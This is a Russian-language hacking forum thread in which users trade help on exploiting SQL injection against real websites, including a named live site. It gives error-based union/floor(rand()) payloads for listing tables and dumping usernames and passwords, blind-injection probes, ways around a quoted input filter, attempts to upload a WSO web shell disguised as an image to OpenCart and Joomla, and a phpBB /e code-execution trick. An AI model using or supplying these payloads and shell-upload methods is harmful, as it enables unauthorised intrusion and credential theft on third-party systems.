Эх да ' фильтрует( Да с пробелом и без пробовал.. всё равно та же ошибка http://clip.corp.mail.ru/clip/m517/1380815456-clip-22kb-sVmu65bUCDSD.png /название бд достал card
Всё, что идёт перед select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row(). Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)
Обычно эта ошибка от неправильного запроса, нужно для начала найти точку опорную без ошибки и постепенно менять запрос. Есть разные тулзы для такого, но если надо в ручную, могу помочь подобрать запрос если это будет возможно. Если что в лс
Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё. ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t
cards - первая таблица, так как limit n,1, где n=0 дальше перебирай с помощью лимита, n=n+1 UPD смотри Вот это запрос на выборку данных (username и password) из таблицы user. (то, что в области с красной границей, это и есть данные вида usernameassword). Для перебора используем лимит(то, что в области с желтой границей).
Всем доброго времени суток, подскажите как узнать имя залитого файла. залил шелл формата wso2.php.jpg Движок на который заливал OpenCart
Code: $result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii"); тут только в слепую крутить получается через benchmark в других же случаях выдает niiiii =\ подскажите как ещё попробовать??
Приветствую! Дано: joomla 2.5.x, читалка файлов (через скрипт с file_get_contents), одна слепая скуля и в результате нее (сбрутил пароль из users) доступ в админку джумлы с правами редактора. Вопрос: как залить шелл? Нифига не получается - уже голову всю сломал. Через png с прицепленым к концу wso shell не получается, да и file_priv = N, соответственно через INTO OUTFILE тоже мимо
Помогите раскрутить, через sqlmap не получается у меня. info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
Зависит от того, что потом происходит с данными из $result. Запятые вырезаются http://info.draconic.ru/?part=npcs&id=95 and mid(version()from 1 for 1)=5
Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
Раскрутить можно как классическую слепую Code: function AntiInject($str, $max_len = 500) { $words = array("\\", "'", ",", ";", "--", "%20", "%27", "$", "*", "WHERE", "DELETE", "DROP", "SELECT", "UPDATE", "INSERT", "EXEC", "TRUNCATE", "SHUTDOWN", "<", ">"); /* replacing < > , ----->>*/ $str = trim(str_replace($words, "", $str)); if (strlen($str)>$max_len) $str = ""; return $str; } Доставило, что при проверке содержимое не приводится к общему регистру. + http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=5 - http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=4
попробуй через востонавление БД, создаешь файлик, в нем прописываешь: PHP: UPDATE nuke_bbusers SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; потом идешь в профиль аккаунта и смотришь выполнится ли пхпинфо user_id=2 это акк к которому есть доступ, по умолчанию админский прописан...
Растолкуйте пожалуйста запрос: concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) что он делает? по идее вроде после 0x3a ожидается ввод параметра или нет? и для чего здесь count(*)?